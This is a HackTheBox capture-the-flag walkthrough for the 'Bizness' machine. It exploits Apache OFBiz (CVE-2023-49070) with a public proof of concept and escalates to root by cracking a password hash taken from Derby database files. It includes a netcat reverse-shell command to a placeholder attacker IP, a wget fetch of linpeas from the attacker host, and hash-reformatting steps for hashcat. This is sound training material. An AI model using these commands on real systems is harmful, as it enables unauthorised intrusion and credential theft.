Bizness Writeup
Intro
Welcome to the Bizness challenge from HackTheBox; here is the link to the room.
In this challenge we are going to practice some web application RCE and then hash cracking to escalate our privileges.
To interact with the machine connect via OpenVPN using the "lab" config profile.
Whenever you feel ready press "Join the Machine"
The Challenge
Before starting we can add the IP address to the hosts file:
sudo nano /etc/hosts
MACHINE-IP bizness.htb
Let's start with a port scan using nmap:
nmap -sV MACHINE-IP
Here is the scan report:
PORT    STATE SERVICE  REASON         VERSION
22/tcp  open  ssh      syn-ack ttl 63 OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
80/tcp  open  http     syn-ack ttl 63 nginx 1.18.0
443/tcp open  ssl/http syn-ack ttl 63 nginx 1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
We can see there is a webserver, let's visit the page:
Looking around we can find "Powered by Apache OFBiz", so I searched for known vulnerabilities, but we still need to find out which version it is running. I decided to do a directory scan, since other pages might reveal more information about the deployment.
dirsearch -u https://bizness.htb/
I found /solr/control/checkLogin/; navigating to it we can see a login page, and in the bottom right corner there is the version of Apache OFBiz, which is 18.12.
Now we can better target our search, and I came across an RCE vulnerability known as CVE-2023-49070. On GitHub there is a PoC that we can download:
git clone https://github.com/jakabakos/Apache-OFBiz-Authentication-Bypass.git
Once you have cloned it, navigate inside the directory and run:
python3 exploit.py --url https://bizness.htb --cmd 'nc -e /bin/bash YOUR-IP PORT'
On your machine you need to have a listener enabled:
nc -lvnp PORT
And you will have the shell, now we can grab the first flag:
Firstly let's upgrade the shell:
python3 -c 'import pty; pty.spawn("/bin/bash")'
Then put the shell in the background with CTRL+Z and type:
stty raw -echo
Foreground the reverse shell:
fg
Reset the shell
reset
export SHELL=bash
export TERM=xterm-256color
Now you should have a fully interactive shell.
cat /home/ofbiz/user.txt
Privilege Escalation
It is time to escalate our privileges to root to read the last flag.
I used the linpeas script to help me:
cp /usr/share/peass/linpeas/linpeas.sh .
We need to transfer it to the target.
On your machine:
python3 -m http.server
On the target machine:
wget http://ATTACKER-IP:8000/linpeas.sh
Make the script executable:
chmod +x linpeas.sh
Now run it:
./linpeas.sh > report.txt
One interesting path was continuously appearing: /opt/ofbiz/runtime/data/derby/
Now we can go and take a look at the database directory that linpeas discovered:
cd /opt/ofbiz/runtime/data/derby/ofbiz/seg0
In this directory I tried searching for keywords like this:
grep -r -l "Password" *
Until I found the file containing what I was looking for:
strings c54d0.dat
--> currentPassword=$SHA$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2I
Looking at this we can understand that the hash type is SHA, d is the salt and the rest is the hashed bytes (Base64 encoded).
Before throwing it into hashcat we have to apply some changes, because the hash has undergone some modifications (as we can see in the files at /opt/ofbiz/framework/base/src/main/java/org/apache/ofbiz/base/crypto):
- Substitute _ with / and - with +
- Encode the result in hex
- Remove the spaces
- Add the salt :d
We can do all the above steps using CyberChef online or by creating a script; the choice is yours.
Now we can create a file containing the hash:
echo "HASH:d" > hash.txt
At this point we can run hashcat:
hashcat -a 0 -m 120 hash.txt /usr/share/wordlists/rockyou.txt
And in a short time we get the root password: monkeybizness. Now we can log in and get the root flag:
su root
cat /root/root.txt
Congratulations, we are now in Bizness! I hope you had fun and learned something new.
If you wanna see more write-ups you can check the WriteUps Directory in this GitHub repo.
Catch you in the next CTF 😃